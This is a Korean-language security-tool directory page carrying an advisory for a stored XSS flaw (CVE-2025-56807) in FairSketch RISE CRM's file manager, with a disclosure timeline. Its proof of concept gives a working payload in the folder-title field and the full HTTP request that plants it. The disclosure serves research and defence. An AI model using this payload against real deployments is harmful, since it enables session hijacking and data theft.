Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-56807 — CVE-2025-56807: FairSketch RISE Ultimate Project Manager & CRM(v3.9.4)의 파일 관리자 기능에서 저장형 교차 사이트 스크립팅(XSS) 취약점이 발견되었습니다. | Kitploit
도구/GitHubGitHub/aqwainfosec/cve-2025-56807
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

CVE-2025-56807: FairSketch RISE Ultimate Project Manager & CRM(v3.9.4)의 파일 관리자 기능에서 저장형 교차 사이트 스크립팅(XSS) 취약점이 발견되었습니다.

저장소 보기
10개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-56807

설명

FairSketch RISE Ultimate Project Manager & CRM(v3.9.4)의 File Manager 기능에서 저장형 XSS(Stored Cross Site Scripting) 취약점이 발견되었습니다. 이 취약점은 새 폴더를 만들 때 제출되는 _title 매개변수_에 존재합니다. 입력값 검증이 충분하지 않기 때문에 공격자는 _HTML/JavaScript 페이로드(예: <details/open/ontoggle=prompt(origin)>)_를 주입할 수 있습니다. 해당 페이로드는 폴더 이름에 저장되며 File Manager에서 폴더 목록을 표시할 때 실행되어, 영향을 받는 폴더를 보는 모든 사용자의 브라우저에서 임의의 JavaScript가 실행될 수 있습니다. 이로 인해 세션 하이재킹과 데이터 유출이 발생할 수 있습니다.

[!NOTE]
이 취약점은 관리자 계정에만 국한되지 않습니다. File Manager에서 새 폴더를 만들 수 있는 권한이 있는 모든 사용자 계정으로 악용될 수 있습니다.

공개 타임라인

  • 지정된 CVE ID: CVE-2025-56807
  • 발견: 2025년 7월 (Aqwa Hameed)
  • 공급업체 통지: Fairsketch 지원팀에 이메일 발송
  • 응답: 2025년 7월 22일 공급업체가 확인함

개념 증명(PoC)

  1. 유효한 자격 증명으로 로그인합니다.

  2. Files로 이동합니다.

    대시보드

  3. New Folder를 클릭합니다.

    File Manager

  4. 아래 페이로드를 Title 필드에 입력합니다:

root@kitploit:~
<details/open/ontoggle=prompt(origin)>

폴더 이름

  1. File Manager 페이지를 새로고침하여 페이로드를 트리거합니다.

    페이로드 실행

요청

root@kitploit:~
POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
도구 다운로드